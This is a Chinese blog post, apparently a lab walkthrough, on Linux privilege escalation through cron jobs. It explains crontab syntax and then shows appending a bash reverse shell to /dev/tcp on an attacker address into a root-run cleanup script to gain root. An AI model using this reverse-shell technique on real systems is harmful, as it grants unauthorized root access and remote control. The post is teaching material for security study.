Cronjob提权

最新推荐文章于 2024-07-07 21:30:26 发布
最新推荐文章于 2024-07-07 21:30:26 发布
阅读量435 收藏 10
点赞数 5
文章标签: 笔记 网络安全 web安全 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/138006570
版权

参考:
https://redpomelo.xyz/archives/1699953656909

前言

提权为该靶机的精髓,Cronjob通常以root特权运行。如果我们可以成功篡改cronjob中

定义的任何脚本或二进制文件,那么我们可以以root特权执行任意

代码。

什么是Cronjob

Cron Jobs被用于通过在服务器上的特定日期和时间执行命令来安排任务。它们最常用于

sysadmin任务,如备份或清理/tmp/目录等。Cron这个词来自crontab,它存在于/etc目

录中。例如:在crontab内部,我们可以添加以下条目,以每1小时自动打印一次apache错误日

1 0 * * * printf “” > /var/log/apache/error_log
  • 前五个数字值表示执行cronjob的时间。现在让我们了解五个数字值。
  • 分钟–第一个值表示介于0到59之间的分钟范围,而*表示任何分钟。
  • 小时–第二个值表示小时范围在0到24之间,*表示任何小时。
  • 月中的某天–第三个值表示月中的某日,范围是1到31,*表示任何一天。
  • 月–第四个值表示1到12之间的月份范围,*表示任何月份。
  • 星期几–第五个值表示从星期天开始的星期几,介于0到6之间,*表示星期几。

提权

我们看一下/etc/crontab这个文件

cat /etc/crontab

img

有个任务是以root权限执行的,直接在里面写shell,静待1到五分钟

echo "/bin/bash -i >& /dev/tcp/192.168.xx.xxx/4444 0>&1" >> /etc/script/CleaningScript.sh

img

成功拿到root权限,至此,此靶机结束

尘佑不尘
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
20210423web渗透学习之Linux下CRON JOBS 提权
qq_45290991的博客
04-24 552
本文其实介绍了一种很偏僻的提权方式,但是没有前面几篇mysql udf提权来的鸡肋,因为mysql实战几乎用不上,好吧这个其实也差不多(emmm……),最近出院了,今天多学点东西,五一有5天的假期,终于能够好好学习了,希望领导不要安排太多b事……参考链接:https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ https://xz.aliyun.com/t/2401 https://www.freebuf..
hackthebox - Europa (考点:dns信息搜集 & SQL注入 & php代码审计漏洞 preg_replace() & cronjob提权
冬萍子癸水
05-28 251
1 扫描 22想到有可能ssh登录 80 http 和443https 都是进网页搜集信息 底下还提示了新的dns domainadmin-portal.europacorp.htb,加到本机kali的/etc/hosts里 10.10.10.22 admin-portal.europacorp.htb C:\root> nmap -A 10.10.10.22 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 03:38 EDT Nmap
WEB到内网&&文件上传&&SSH公私钥免密登录&&Cron job提权--------打靶经验分享
qq_53003652的博客
08-21 235
今天来打一个OSCP的靶机Amaterasu,难度中等,包含了端口探测,文件上传,ssh公私钥实现免密登录,定时任务提权等等…靶场难度中等,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家能有所收获。
浅析Linux系统常规提权手段的原理与技巧
道阻且长,行则将至。
01-08 1205
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的权限,而为了进一步获得高权限 Shell(root),避免不了地就是进一步进行提权。本文来学习、总结下 Linux 系统一些常规的提权手段的原理与技巧。
Linux提权第四篇-Linux Cron Jobs(任务计划)提权crontab文件覆盖提权Crontab Tar Wildcard(通配符)注入提权
Love&Share
11-19 4765
文章目录Linux Cron Jobs提权crontab文件覆盖提权环境搭建提权Crontab Tar Wildcard(通配符)注入环境准备提权 Linux Cron Jobs提权 定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /etc/cron.*/ .
Linux提权基础
2301_77004573的博客
11-08 170
( backup.sh 脚本有定义完整的路径),cron 将引用 /etc/crontab 文件中的 PATH 变量下列出的路径;在这种情况下,我们可以尝试在用户的主文件夹(home)下创建一个名为“antivirus.sh”的脚本,然后让它作为 cron 任务运行。最终传入的反向 shell 连接能够帮助我们成功获取 root 权限。一旦你发现现有的脚本或任务被附加到cron jobs,那么就值得花时间去了解相关脚本的功能以及如何在上下文中使用工具对cron jobs进行利用。
系统提权之:Unix 提权
f_carey的博客
08-28 577
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 系统提权之:Unix 提权1 Unix 内核漏洞提权1.1 利用前提1.2 利用 NC 建立 Shell 会话(便于操作)1.2.1 本地配置 NC 监听1.2.2 上传 perl-reverse-shell.pl 反弹 Shell1.3 查询 Unitx 系统内核信息1.4 查找内核版本对应的提权 EXP1..
Linux 定时任务提权
大河之犬的博客
06-19 1804
定时任务(cron job)是Linux系统中的一个守护进程,用于调度重复任务,通过配置crontab可以让系统周期性地执行某些命令或者脚本。cron 是 Linux 系统中最为实用的工具之一,但是也可能被黑客用于提权操作。由于cron通常以root特权运行,如果我们可以修改其调度的任何脚本或二进制文件,那么便可以使用root权限执行任意代码。
Linux提权方法总结
Ays.Ie的博客
11-06 3473
Linux提权方式总结
Yii框架创建cronjob定时任务的方法分析
10-19
主要介绍了Yii框架创建cronjob定时任务的方法,结合具体实例形式分析了Yii定时任务相关配置、实现步骤与注意事项,需要的朋友可以参考下
建立Cron Job.docx
02-22
Cron Job】是Linux操作系统中的一个调度工具,用于定期执行任务。它允许用户或系统管理员安排任务在特定的时间点自动执行,无需人工干预。在Linux中,Cron Job通过`crontab`命令进行管理和配置。 **1. `crontab`...
Linux提权手法总结以及 Linux提权exp集合
02-22
定时任务提权则依赖于cron或at等系统调度工具。攻击者可能通过篡改或注入定时任务来执行恶意脚本。因此,定期检查`crontab`配置,限制非管理员用户的定时任务权限,是非常重要的安全措施。 sudo提权是攻击者利用...
cronjob-cleaner:Kubernetes可以清除卡住或长期运行的CronJobs的应用程序
04-12
CronJob清洁剂 为什么 我写这种清洁程序是为了删除“卡住”的作业的吊舱,这些作业似乎只是停止执行任何工作,但该作业和吊舱都处于运行状态数小时。 activeDeadlineSecond会删除作业,但这不会解决警报管理器发出的...
Kubernetes之JobCronJob详解
01-07
最近学习Kubernetes碰到JobCronJob,在这里总结记录一下。 Job Job控制器也是Kubernetes中的一个重要的控制器资源,但是它和Deployment、DaemonSet不同的是:Job控制器用于调配pod对象中的运行一次性的任务。 在...
2024-07-05 base SAS programming学习笔记9(variables)
ddjdd1234的博客
07-05 456
由于SAS 每次都会执行IF THEN 语句,因此在对同一个变量进行操作时使用IF THEN ELSE IF THEN 语句来提高效率,避免重复使用IF-THEN 语句,在碰到TRUE的情况则会跳出该IF 语句。如果不存在select expression ,则会对每个when 语句判断TRUE或FALSE,SAS只会执行首次判断为TRUE的语句,一旦存在TRUE语句则跳出不对其他WHEN语句进行判断。在每次DO循环前检查是否满足WHILE的条件,只有满足WHILE的条件才继续循环,如果不满足则终止循环。
Vue笔记12-新的组件
最新发布
王劭阳的博客
07-07 143
是一个内置组件,用来在组件树中协调对异步依赖的处理。它让我们可以在组件树上层等待下层的多个嵌套异步依赖项解析完成,并可以在等待时渲染一个加载状态,需要结合异步依赖,才能看到效果。在Vue3中,可以没有div根标签,如果没有的话,Vue3会将多个标签包装在一个。在Vue2中,template标签内,必须有一个div标签,作为根标签。是一个内置组件,可以将一个组件内部的模板传送到该组件DOM外部的位置去。
数据结构学习笔记-十大排序算法
2301_81135589的博客
07-03 448
进行S趟k路归并,把k个归并段的块读入k个输入缓冲区,用“归并排序”的方法从k个归并段中选出几个最小记录,暂存到输出缓冲区中,当输出缓冲区满时,写出外存。6)重复3)~5),直至在WA中选不出新的MINIMAX记录为止,由此得到一个初始归并段,输出一个归并段的结束标志到FO中去。设初始待排文件为FI,初始归并段输出文件为FO,内存工作区为WA,FO和WA的初始状态为空,WA可容纳w个记录到工作区WA。5)从WA中所有关键字比MINMAX记录的关键字大的记录中选出最小关键字记录,作为新的MINIMAX记录。
[笔记] 卷积 - 01 变速箱需要放置多少个加速度传感器?
含光左卫的工作笔记集
07-03 926
卷积运算以及在振动分析中的应用。一些笔记和讨论。其他的卷积运算适用的场合,如信号与系统,机械涉及,机器学习可以参考。
k8s cronjob详解
09-03
Kubernetes中的CronJob是一种用于周期性执行任务的机制。它主要用于定期运行特定的作业,如数据备份、定时报告、定时任务等。 CronJob是基于Unix中的cron表达式的,该表达式由五个字段组成:分、时、日、月、周几。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值